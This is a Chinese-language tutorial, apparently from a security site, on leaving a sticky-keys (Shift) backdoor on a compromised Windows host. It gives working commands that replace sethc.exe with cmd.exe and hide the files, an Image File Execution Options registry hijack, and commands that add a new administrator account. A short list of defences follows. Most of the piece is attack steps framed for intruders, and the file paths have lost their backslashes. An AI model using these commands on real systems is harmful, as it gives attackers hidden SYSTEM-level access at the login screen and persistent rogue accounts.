0x00 前言

通常，在內(nèi)網(wǎng)滲透打下一臺(tái)機(jī)子之后，可以給這臺(tái)機(jī)子留個(gè)Shift后門(mén)。

0x01 Shift后門(mén)利用

簡(jiǎn)介

粘滯鍵漏洞，在Windows系統(tǒng)下連續(xù)按5下SHIFT鍵，可以啟動(dòng)系統(tǒng)的粘滯鍵功能，其進(jìn)程名為Sethc.exe，應(yīng)用程序在Windowssystem32下。

黑客用其它應(yīng)用程序（如：cmd.exe、explorer.exe 或木馬、病毒）將Sethc.exe替換。當(dāng)再次連續(xù)按5次SHIFT鍵，就會(huì)啟動(dòng)黑客替換的應(yīng)用程序，如此便留下了5下SHIFT后門(mén)，黑客3389登錄遠(yuǎn)程計(jì)算機(jī)時(shí)，在用戶登錄界面，連續(xù)按5下SHIFT就可以啟動(dòng)該漏洞，進(jìn)而控制遠(yuǎn)程計(jì)算機(jī)。

漏洞原理

在Windows系統(tǒng)登錄界面狀態(tài)下，粘滯鍵仍可以以連續(xù)按5下SHIFT鍵運(yùn)行，并且此時(shí)應(yīng)用程序會(huì)以WINDOWS的最高權(quán)限－SYSTEM權(quán)限運(yùn)行，所以計(jì)算機(jī)一旦被安裝該后門(mén)，入侵者便可悄無(wú)聲息地遠(yuǎn)程操縱計(jì)算機(jī)。

漏洞利用

大致思路如下：

拿到目標(biāo)主機(jī)權(quán)限后，到Windowssystem32目錄下，將sethc.exe替換成cmd.exe；

其中，命令行方式為：

copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe
copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe
attrib c:windowssystem32sethc.exe +h
attrib c:windowssystem32dllcachesethc.exe +h

注意：要將dllcache文件夾中的緩存刪掉，否則會(huì)自動(dòng)復(fù)原回去。

注冊(cè)表方式為：

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"

命令說(shuō)明：reg add是向注冊(cè)表添加記錄，后面跟的是注冊(cè)表的位置，注意的是HKLM是HKEY_LOCAL_MACHINE的縮寫(xiě)。Image File Execution Option這個(gè)目錄是用來(lái)設(shè)置鏡像劫持的，要被劫持的就是命令中的sethc粘滯鍵程序，隨后通過(guò)/ v來(lái)指定鍵名，其中鍵名debugger是固定的，然后通過(guò)/ t來(lái)指定REG_SZ字符串類型，最后通過(guò)/ d來(lái)指定鍵的值，即被惡意替換的程序cmd.exe。

這樣，在下次遠(yuǎn)程連接目標(biāo)主機(jī)登錄的時(shí)候就可以連續(xù)5下SHIFT觸發(fā)cmd.exe；

可以輸入explorer.exe調(diào)出程序管理系統(tǒng)方便操作；

當(dāng)然，上面的方法存在缺陷，就是可能會(huì)導(dǎo)致遠(yuǎn)程連接無(wú)法持久進(jìn)行，因此可以直接添加新用戶便于下次直接登錄：

net user mi1k7ea 123456 /add
net localgroup administrators mi1k7ea /add'

防御方法

如果系統(tǒng)盤(pán)為NTFS文件系統(tǒng)，可以將sytem32下的sethc.exe文件設(shè)為everyone拒絕訪問(wèn)；

直接將其刪除，最好的方法是在控制面板-輔助功能選項(xiàng)-粘滯鍵選項(xiàng)，將“使用快捷鍵”取消即可。；

通過(guò)注冊(cè)表設(shè)置實(shí)現(xiàn)防御；

審核編輯 ：李倩